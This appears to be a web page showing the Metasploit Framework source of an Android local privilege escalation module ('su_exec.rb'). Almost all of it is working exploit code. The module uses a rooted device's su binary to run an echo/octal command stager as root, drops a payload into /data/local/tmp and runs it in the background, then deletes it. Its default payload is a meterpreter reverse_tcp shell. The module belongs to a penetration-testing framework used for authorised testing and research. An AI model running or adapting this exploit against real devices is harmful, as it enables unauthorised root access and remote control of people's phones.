Book a Demo!
CoCalc Logo Icon
StoreFeaturesDocsShareSupportNewsAboutPoliciesSign UpSign In
rapid7
GitHub Repository: rapid7/metasploit-framework
 Path: blob/master/modules/exploits/android/local/su_exec.rb
31684 views
1
##

2
# This module requires Metasploit: https://metasploit.com/download

3
# Current source: https://github.com/rapid7/metasploit-framework

4
##

5


6
class MetasploitModule < Msf::Exploit::Local

7
  Rank = ManualRanking

8


9
  include Msf::Exploit::CmdStager

10
  include Msf::Post::File

11
  include Msf::Post::Android::Priv

12


13
  def initialize(info = {})

14
    super(

15
      update_info(

16
        info,

17
        {

18
          'Name' => "Android 'su' Privilege Escalation",

19
          'Description' => %q{

20
            This module uses the su binary present on rooted devices to run

21
            a payload as root.

22


23
            A rooted Android device will contain a su binary (often linked with

24
            an application) that allows the user to run commands as root.

25
            This module will use the su binary to execute a command stager

26
            as root. The command stager will write a payload binary to a

27
            temporary directory, make it executable, execute it in the background,

28
            and finally delete the executable.

29


30
            On most devices the su binary will pop-up a prompt on the device

31
            asking the user for permission.

32
          },

33
          'Author' => 'timwr',

34
          'License' => MSF_LICENSE,

35
          'DisclosureDate' => '2017-08-31',

36
          'SessionTypes' => [ 'meterpreter', 'shell' ],

37
          'Platform' => [ 'android', 'linux' ],

38
          'Targets' => [

39
            ['aarch64', { 'Arch' => ARCH_AARCH64 }],

40
            ['armle', { 'Arch' => ARCH_ARMLE }],

41
            ['x86', { 'Arch' => ARCH_X86 }],

42
            ['x64', { 'Arch' => ARCH_X64 }],

43
            ['mipsle', { 'Arch' => ARCH_MIPSLE }]

44
          ],

45
          'DefaultOptions' => {

46
            'PAYLOAD' => 'linux/aarch64/meterpreter/reverse_tcp',

47
            'WfsDelay' => 5

48
          },

49
          'DefaultTarget' => 0,

50
          'Notes' => {

51
            'SideEffects' => [ ARTIFACTS_ON_DISK ],

52
            'Reliability' => [ REPEATABLE_SESSION ],

53
            'Stability' => [ CRASH_SAFE ]

54
          }

55
        }

56
      )

57
    )

58
    register_options([

59
      OptString.new('SU_BINARY', [true, 'The su binary to execute to obtain root', 'su']),

60
      OptString.new('WritableDir', [true, 'Writable directory', '/data/local/tmp/']),

61
    ])

62
  end

63


64
  def base_dir

65
    datastore['WritableDir'].to_s

66
  end

67


68
  def su_bin

69
    datastore['SU_BINARY'].to_s

70
  end

71


72
  def exploit

73
    if is_root?

74
      fail_with(Failure::BadConfig, 'Session already has root privileges')

75
    end

76


77
    linemax = 4088 - su_bin.size

78
    execute_cmdstager({

79
      flavor: :echo,

80
      enc_format: :octal,

81
      prefix: '\\\\0',

82
      temp: base_dir,

83
      linemax: linemax,

84
      background: true

85
    })

86
  end

87


88
  def execute_command(cmd, _opts)

89
    cmd_exec("#{su_bin} -c '#{cmd}'")

90
  end

91
end

92


93